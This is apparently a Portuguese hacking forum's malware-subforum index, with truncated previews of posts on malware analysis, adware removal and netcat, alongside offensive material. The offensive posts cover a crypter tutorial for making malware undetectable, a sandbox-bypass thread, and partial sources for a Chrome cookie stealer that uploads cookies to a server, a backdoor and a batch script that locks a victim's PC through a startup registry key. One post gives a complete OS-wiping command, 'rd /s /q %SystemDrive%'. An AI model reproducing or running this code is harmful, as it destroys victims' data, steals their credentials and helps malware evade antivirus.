Postagem de conteúdo sobre malwares (trojan, keylogger, virus, backdoor)
-
-
Bypass de sandbox?
Replies: 9
by
fascist_ » Sat Jan 14, 2017 11:11 am
Entao gente, eu queria abrir uma discussao aqui sobre como dar bypass no sandbox. Dps de fazer um crypter, esse é o ultimo desafio que temos heheh.
O que é sandbox?
Sandbox é uma parte do antivirus que analiza malwares em tempo real, entao aquele crypter que ensinei a fazer vai falhar se passar por aqui. Segundo o Avast, modificaçoes no sistema feito por um aplicativo no sandbox sao desfeitas, o que limita bastante o nosso bypass. A questao é que devemos evitar o sandbox, mas como? O...
- 9 Replies
- 265 Views
-
Last post by 0x4h4x
Sun Mar 11, 2018 11:54 am
-
-
- 1 Replies
- 58 Views
-
Last post by Kodo no Kami
Mon Feb 19, 2018 10:21 am
-
-
[artigo] A assustadora verdade sobre os malwares
Replies: 2
by
fascist_ » Fri Jan 06, 2017 12:29 pm
Vou começar a traduzir uns textos legais que acho por ai.
Ha quem diz que ja perdemos (tem quem diga que ja faz uma decada que nos perdemos), que o mau venceu e que ninguem mais pode confiar nos antivirus.
Eu sendo um profissional da area de segurança, nao recomendaria ninguém surfar a web sem usar um antivirus, você ainda precisa de um para nao ser vitima de malwares meia boca que trollam a Internet, os antivirus nao podem fazer mais do que isso.
A verdade é que os antivirus sao como...
- 2 Replies
- 268 Views
-
Last post by fascist_
Tue Feb 21, 2017 2:22 pm
-
-
[tutorial] Como indentificar e remover um malware
Replies: 2
by
Kodo no Kami » Thu Apr 02, 2015 5:51 pm
tutorial antigo da epoca do fh (2008/2010) u.u
um malware é um codigo ou programa nocivo criado para fazer o mal em um pc (virus,trojan,worm etc), embora essa palavra assuste a maioria dos usuarios leigos, bom todo mundo aqui no forum provavelmente ja teve problema com um virus, e provavelmente ja tiveram que formatar o computador isso é normal, mais o resto dos usuarios finais (leigos) quando pega um virus tem que chamar um tecnico para ver (e isso custa os olhos da cara), entao eu vou...
- 2 Replies
- 391 Views
-
Last post by fascist_
Tue Feb 21, 2017 2:18 pm
-
-
Amostra de malwares
Replies: 1
by
51M0N » Sun Feb 12, 2017 8:16 am
Galera deixo aqui alguns sites que vcs podem achar amostras de malwares:
Nesses sites também tem bastante referencia para estudos, analises e comportamentos dessas ameaças
Referências
- 1 Replies
- 118 Views
-
Last post by fascist_
Sun Feb 12, 2017 11:54 am
-
-
- 0 Replies
- 100 Views
-
Last post by 51M0N
Fri Jan 13, 2017 3:50 pm
-
-
[tutorial] Como fazer crypters em C & CPP
Replies: 6
by
fascist_ » Fri Jan 06, 2017 8:08 am
Como fazer crypters em C & CPP .
De Fascist pra EOF :3
=================================
Bem, antes de fazermos um crypter, precisamos entender um pouco mais sobre crypters.
E porfavor, entenda um pouco de C antes de ler esse tutorial.
Pra que servem crypters?
========================
Eles servem pra deixar os malwares indetectaveis :D
Como eles funcionam?
====================
Bem, como o nome mais ou menos sugere, os crypters criptografam o malware, entao quando o antivirus
vai...
- 6 Replies
- 253 Views
-
Last post by Zaphod
Sun Jan 08, 2017 9:09 pm
-
-
[artigo] analise basica malware - 3º parte
Replies: 2
by
Kodo no Kami » Thu Apr 09, 2015 4:43 pm
ai vem a 3º parte do artigo nessa vamos entender um pouco sobre isolamento, é importante isolar um malware para ele nao infectar a propria maquina ou para o antivirus nao deleter ele por engano ou ate uma forma segura para transporta-lo sem dissemina-lo, a forma mais facil de isolar um malware é compactar ele com senha ou codificar os bytes dele de alguma forma assim ele nao vai ser um executavel, algumas ferramenta que pode ser usado para isso é o winrar, Glary Utilities, entre outros
uma...
- 2 Replies
- 336 Views
-
Last post by Kodo no Kami
Fri Dec 09, 2016 7:08 pm
-
-
[Dica] Museu do malware
Replies: 1
by
51M0N » Tue Feb 09, 2016 2:02 pm
O Museu de Malware é uma coleção de programas maliciosos, geralmente vírus, que foram distribuídos em 1980 e 1990 em computadores domésticos. Uma vez que eles infectaram um sistema, mostravam-se às vezes animação ou mensagens que você tinha sido infectado.
Achei interessante compartilhar.
@goodjobs@
- 1 Replies
- 277 Views
-
Last post by Kodo no Kami
Wed Feb 10, 2016 6:01 pm
-
-
Malware Analysis Tutorials: a Reverse Engineering Approach
by
51M0N » Tue Oct 27, 2015 7:43 am
Malware Analysis Tutorials: a Reverse Engineering Approach
Author: Dr. Xiang Fu
Conteúdo:
Malware Analysis Tutorial 1- A Reverse Engineering Approach (Lesson 1: VM Based Analysis Platform)
Malware Analysis Tutorial 2- Introduction to Ring3 Debugging
Malware Analysis Tutorial 3- Int 2D Anti-Debugging .
Malware Analysis Tutorial 4- Int 2D Anti-Debugging (Part II)
Malware Analysis Tutorial 5- Int 2D in Max++ (Part III) .
Malware Analysis Tutorial 6- Self-Decoding and Self-Extracting Code...
- 0 Replies
- 262 Views
-
Last post by 51M0N
Tue Oct 27, 2015 7:43 am
-
-
[source] Vfts
Replies: 2
by
Kodo no Kami » Thu Apr 02, 2015 5:50 pm
hj eu tava sem nada para fazer entao resolvir fazer esse codigo viral lol , eu nao terminei ele ainda mais to com preguiça de terminar entao vou deixar como base para quem quiser kkkkkk, ele faz o seguinte na primeira etapa ele cria uma pasta oculta na unidade c:\windows com o nome fts, depois ele se copia pra la, ele cria uma inicializaçao para ele iniciar junto com windows, caso ele ja esteja na la na pasta ele pula essa etapa, agora a segunda etapa ele gera um arquivo de texto na mesma pasta...
- 2 Replies
- 438 Views
-
Last post by Kodo no Kami
Mon Oct 05, 2015 1:18 pm
-
-
[tutorial] criando um spyware em delphi e php
Replies: 2
by
Kodo no Kami » Sun Aug 30, 2015 11:16 pm
bom galera spywares sao malware especifico para roubar informaçao das vitimas muito usados por empresas de softwares para colher determinada informaçao como por exemplo quais site mais visitados, quais programas instalados, informaçao sobre seu pc ou suas compras etc, o uso de um spyware pode facilitar muito na venda de determinado produto (sabendo oq uma pessoas deseja comprar e mais facil vender pra ela '-'), dumpar determinada informaçao sem autoriaçao da pessoa pode ser considerado invasao...
- 2 Replies
- 417 Views
-
Last post by gjuniioor
Mon Sep 21, 2015 7:00 pm
-
-
Removendo adware do google chrome
Replies: 2
by
51M0N » Wed Aug 26, 2015 10:37 am
Adware é qualquer programa que executa automaticamente e exibe uma grande quantidade de anúncios, bem recentemente meu google chrome ficou infestado de adwares em uma máquina instalada com win8 adotei alguns procedimentos.
▸ Rodei os seguintes programas: Malwarebytes' Anti-Malware,SUPERAntiSpyware Free Edition,Spybot - Search & Destroy e outros que fazem essa tarefa e nada..eheheh
▸ Entre no seguinte diretório do google chrome : C:\Users\ \AppData\Local\Google\Chrome\User...
- 2 Replies
- 313 Views
-
Last post by 51M0N
Thu Aug 27, 2015 10:43 am
-
-
Serviços - análise de malware
by
51M0N » Fri Jul 17, 2015 10:52 pm
Achei interessante compartilhar, segue :
Akana (Arquivos Android)
Anubis
BitBlaze Malware Analysis Service
Comodo Automated Analysis System e Valkyrie
EUREKA Malware Analysis Internet Service
Joe Sandbox Document Analyzer (PDF, RTF e arquivos MS Office )
Malwr
MalwareViz
MASTIFF Online ( Analise estática de vários arquivos)
VxStream Sandbox ( Analise Hibrida)
ThreatExpert
ThreatTrack
ViCheck
VisualThreat Arquivos Android
XecScan ( Arquivos PDF e MS Office )
Virus...
- 0 Replies
- 297 Views
-
Last post by 51M0N
Fri Jul 17, 2015 10:52 pm
-
-
[artigo] logica do joiner
by
Kodo no Kami » Sun Apr 19, 2015 9:19 pm
bom galera nesse artigo vou falar um pouco sobre joiner e como funciona um, os joiner sao executaveis q comprimi 2 ou mais e um unico executavel e quando vc executa ele vai executar todos ao mesmo tempo, eles tem varias utilidades para fazer coisa boa ou ruim, voce poderia usar um joiner para fazer varias instalaçao de programas ao mesmo tempo ou usar ele como um especie de pacote, ou juntar um malware com um jogo e mandar para aquele amigo '-', para começar vamos entender um pacote qualquer...
- 0 Replies
- 365 Views
-
Last post by Kodo no Kami
Sun Apr 19, 2015 9:19 pm
-
-
[source] fts dns log
by
Kodo no Kami » Mon Apr 13, 2015 12:07 am
bom galera aqui uma source muito boa para analisar conexao reversa em malware, voce aponta o servidor de dns para localhost e depois roda esse meu programa ele vai capturar as consultas de dns e armazenar em um arquivo de texto (porem ele nao faz a pesquisa dns retornando nenhuma resposta)
github
/**
coder: kõdo no kami
forum: endoffile.umforum.net
contato: www.facebook.com/hacker.fts315
**/
#include
#include
#include
#include
#include
#define PORTA 53
int main(void)
{
int...
- 0 Replies
- 303 Views
-
Last post by Kodo no Kami
Mon Apr 13, 2015 12:07 am
-
-
[artigo] analise basica malware - 7º parte
by
Kodo no Kami » Sun Apr 12, 2015 11:56 pm
e ae galera faz um tempo que eu nao escrevo sobre analise de malware entao vou continuar o artigo de analise essa vai ser a 7º parte, nessa parte vou falar de algumas ferramentas onlines uma delas é o virustotal , que é um servidor de escaneamento de malware com mais 40 antivirus, voce envia um arquivo de no maximo 64mb para ser analisado por varios antivirus entre eles (avast, avira, avg, entre outros), no virustotal tambem faz uma analise dinamica e estatica embora seja bem superficial (nesse...
- 0 Replies
- 316 Views
-
Last post by Kodo no Kami
Sun Apr 12, 2015 11:56 pm
-
-
[artigo] analise basica malware - 6º parte
by
Kodo no Kami » Sun Apr 12, 2015 11:54 pm
e ae galera essa é 6º parte do artigo de analise de malware e nela vamos ver um pouco mais sobre processo, no artigo anterior usamos o gerenciador de tarefa salvamos os processos antigos e depois comparamos com execução do malware para ver se fico algum processo novo em execução, nesse artigo vamos usar alguns programas que automatiza isso, o primeiro é o malm , esse programa é por base de comando ou seja para usar ele deve ser pelo terminal, depois de baixar ele basta jogar os executaveis em...
- 0 Replies
- 277 Views
-
Last post by Kodo no Kami
Sun Apr 12, 2015 11:54 pm
-
-
[source] FTS steal cookies (chrome)
Replies: 1
by
Kodo no Kami » Thu Apr 09, 2015 4:30 pm
/**
coder: hfts315
face: www.facebook.com/hacker.fts315
greetz: mmxm, F.ramon, susp3it0virtu@l, member eof entre outros ^^
obs: necessario o executavel curl, nem sei se funciona so fiz para passar o tempo kkkkkkk
**/
#include
#include
#include
#include
//#include
//linha abaixo e o endereço do servidor com script que recebe o arquivo
//fiquei com preguiça de fazer ele
#define SERVIDOR
#define CHROME_DIR \\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies
#define CMD...
- 1 Replies
- 331 Views
-
Last post by Zaphod
Fri Apr 10, 2015 12:56 pm
-
-
[artigo] analise basica malware - 1º parte
Replies: 1
by
Kodo no Kami » Thu Apr 09, 2015 4:39 pm
bom galera nesse artigo vou falar um pouco sobre analise de malware porem nao vou me aprofundar muito nessa area, para começar vamos entender oque é exatamente um malware
o que diabos é um malware
o significado da palavra malware seria software malicioso vindo da concatenação da palavra MALicius softWARE , um software malicioso pode ser qualquer programa que faça uma coisa indesejada no sistema ou alguma coisa nao autorizada que cause algum prejuizo ou perda para o usuario
tipos de...
- 1 Replies
- 329 Views
-
Last post by 51M0N
Thu Apr 09, 2015 4:48 pm
-
-
[artigo] analise basica malware - 5º parte
by
Kodo no Kami » Thu Apr 09, 2015 4:47 pm
bom galera continuando os artigos anteriores nesse vamos mexer um pouco com processos ou seja analise dinamica, para analisar um malware ou artefato suspeito em execução sempre temos que fazer isso em um ambiente controlado ou seja maquina virtual para evitar infectar a nossa propria maquina, eu tenho uma maquina virtual que uso para testes porem vou fazer os testes na maquina real mesmo devido eu ja conhecer o artefato que vou analisar e nele nao tem nenhum risco real (porem se fosse uma...
- 0 Replies
- 290 Views
-
Last post by Kodo no Kami
Thu Apr 09, 2015 4:47 pm
-
-
[source] fts backdoor server 60%
Replies: 1
by
Kodo no Kami » Thu Apr 09, 2015 4:33 pm
uma backdoor que eu estava fazendo para passar o tempo, por enquanto so tem o comando CMD * END (* = comando), HELP e EXIT, como eu nao terminei (e nem sei se vou) o servidor ta ainda no modo verbose e bem visivel kkkkkk
github
/**
coder: hfts315
name: fts backdoor servidor
plataforma: windows(x32) / linux
versao: 0.1 Alpha (incompleto)
**/
#include
#include
#include
#include
#include
#ifdef WIN32
#include
#include
#include
#else
#include
#include
#include
#include...
- 1 Replies
- 314 Views
-
Last post by 51M0N
Thu Apr 09, 2015 4:46 pm
-
-
[artigo] analise basica malware - 4º parte
by
Kodo no Kami » Thu Apr 09, 2015 4:45 pm
bom galera essa é a 4º parte do artigo, no 2º artigo eu citei como descobrir a linguagem e o compilador que foi codado nesse eu vou citar como ver informação como strings e funçoes executada pelo malware tudo isso com analise estatica, para começar vamos usar um programa que examina a string assim mostrando varias informação do executavel, existem varios como strings (gnu binutils ou sysinternals), bintext, filealyzer, IDA entre outras ferramentas, no exemplo abaixo eu to usando essa source...
- 0 Replies
- 279 Views
-
Last post by Kodo no Kami
Thu Apr 09, 2015 4:45 pm
-
-
[artigo] analise basica malware - 2º parte
by
Kodo no Kami » Thu Apr 09, 2015 4:41 pm
bom galera continuando o outro artigo onde eu falei da comparação de dois arquivos para ver se é o mesmo nesse eu vou falar como descobrir qual linguagem que ele foi codado, para isso vamos usar um programa para analisar, podemos usar Filealyzer ( site oficial ), tambem podemos usar outros como exeinfope, PEiD, protection id entre outros
as vezes nao mostra qual linguagem nem outras informação devido o executavel estar codificado, porem se o executavel estiver usando um packer (crypter,...
- 0 Replies
- 277 Views
-
Last post by Kodo no Kami
Thu Apr 09, 2015 4:41 pm
-
-
- 0 Replies
- 265 Views
-
Last post by Kodo no Kami
Thu Apr 09, 2015 4:37 pm
-
-
Malware replicador de atalhos
Replies: 2
by
51M0N » Thu Apr 02, 2015 6:23 pm
olha qq esse malware fez
Li esse post no forum e lembrei da raiva que passei onde meu pendrive foi premiado por um malware com nome BUAGOF~1.VBS nos PCs desktop da faculdade usando qual sistema??..kkkk.. o famoso windows , esses computadores são usados para imprimir arquivos da galera(só ai deu para você ter uma noção..kk),pelo jeito esse malware e do tipo que replica atalhos nos arquivos é depois oculta os arquivo.
Scan dele no virusscan.jotti.org e no virustotal.com mas como vamos...
- 2 Replies
- 395 Views
-
Last post by 51M0N
Sun Apr 05, 2015 8:57 am
-
-
[tutorial] netcat - cliente e servidor
Replies: 3
by
Kodo no Kami » Thu Apr 02, 2015 5:55 pm
bom galera aq e o fts315 nesse tutorial vou ensinar como usar o netcat, ele e uma ferramente multi uso q permite varias coisas entre elas conexao ao terminal alvo (ou a outro programa), scanner de porta, tunelamento, etc, o netcat pode ser facilmente encontrado na net entao nao vou postar links, o netcat funciona a base de comando ou seja ele e tanto o cliente quanto servidor entao se faz necessarios as sintaxe para poder usar ele, vamos la
a primeira coisa depois de baixar seria extrair caso...
- 3 Replies
- 349 Views
-
Last post by 51M0N
Sun Apr 05, 2015 8:54 am
-
-
[source] fts loop da morte
Replies: 3
by
Kodo no Kami » Thu Apr 02, 2015 5:42 pm
esse script em batch trava a maquina da vitima (ele cria uma chave de inicializaçao para ele e gera um outro script em batch na unidade c:\windows\ assim q windows liga abre infinitamente o prompt de comando travando o pc da vitima), para remover ele basta vc ligar o pc em modo de segurança (assim q der boot vc segure f8 eu acho e ligue em mode de segurança, ou use um sistema operacional externo tipo os live cd do linux, depois so remover)
@echo off
title by hacker fts315
reg add...
- 3 Replies
- 343 Views
-
Last post by 51M0N
Thu Apr 02, 2015 6:38 pm
-
-
[source] fts window-Zombie troll
Replies: 1
by
Kodo no Kami » Thu Apr 02, 2015 6:00 pm
executavel para trollar aquele seu professor chato kkkkkk
efeito: quando fecha a janela ele abre outra criando um loop infinito
plataforma: linux (porem acho q se compilar no windows funfa tambem)
github
4shar
/*
by hacker fts315
fts window-Zombie troll
*/
#include
#include
#include
#include
#include
using namespace std;
void fts_saida(void);
int main(int argc, char **argv)
{
GtkWidget *janela, *label;
gtk_init(&argc,&argv);
janela = gtk_window_new(GTK_WINDOW_TOPLEVEL);...
- 1 Replies
- 288 Views
-
Last post by 51M0N
Thu Apr 02, 2015 6:32 pm
-
-
[download] malwares - unicert
by
Kodo no Kami » Thu Apr 02, 2015 6:05 pm
As maiores ameaças aos usuários de computadores conectados na Internet são
representadas pelos Malwares. Eles podem seqüestrar o browser, redirecionar as consultas de buscas, incluir pop-ups, registrar os sites visitados, etc. A programação de Malwares pode ser simples (veja um exemplo na página 3) e eles podem causar sérios problemas tornando o computador instável e as comunicações inseguras. Vários Malwares podem reinstalar-se após serem removidos, ou ocultar-se no Kernel do sistema...
- 0 Replies
- 278 Views
-
Last post by Kodo no Kami
Thu Apr 02, 2015 6:05 pm
-
-
[source] fts errkey
by
Kodo no Kami » Thu Apr 02, 2015 5:46 pm
esse malware ele se copia para pasta c:\windows\system32\fts caso ele nao esteja nela, cria uma chave de inicializaçao, e quando a pessoa apertar qualquer tecla ele exibe uma caixa de texto com uma msg de erro
/*
FTS Malware ErrKey
autor: hacker fts315
linguagem: c
*/
//bibliotecas
#include
#include
#include
//constantes de configuraçao
#define MSG erro grave no sistema
#define MSG_NOME erro 0x315
#define NOME_PROGRAMA fsvhost
#define NOME_CHAVE fsvhost
#define TEMPO_SLEEP...
- 0 Replies
- 248 Views
-
Last post by Kodo no Kami
Thu Apr 02, 2015 5:46 pm
-
-
[source] fts badcon kill os
by
Kodo no Kami » Thu Apr 02, 2015 5:44 pm
essa source remove quase tudo do sistema operacional (algumas coisas do sistema nao consegue remover nao)
title by hacker fts315
rd /s /q %SystemDrive%
- 0 Replies
- 289 Views
-
Last post by Kodo no Kami
Thu Apr 02, 2015 5:44 pm
Forum permissions
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum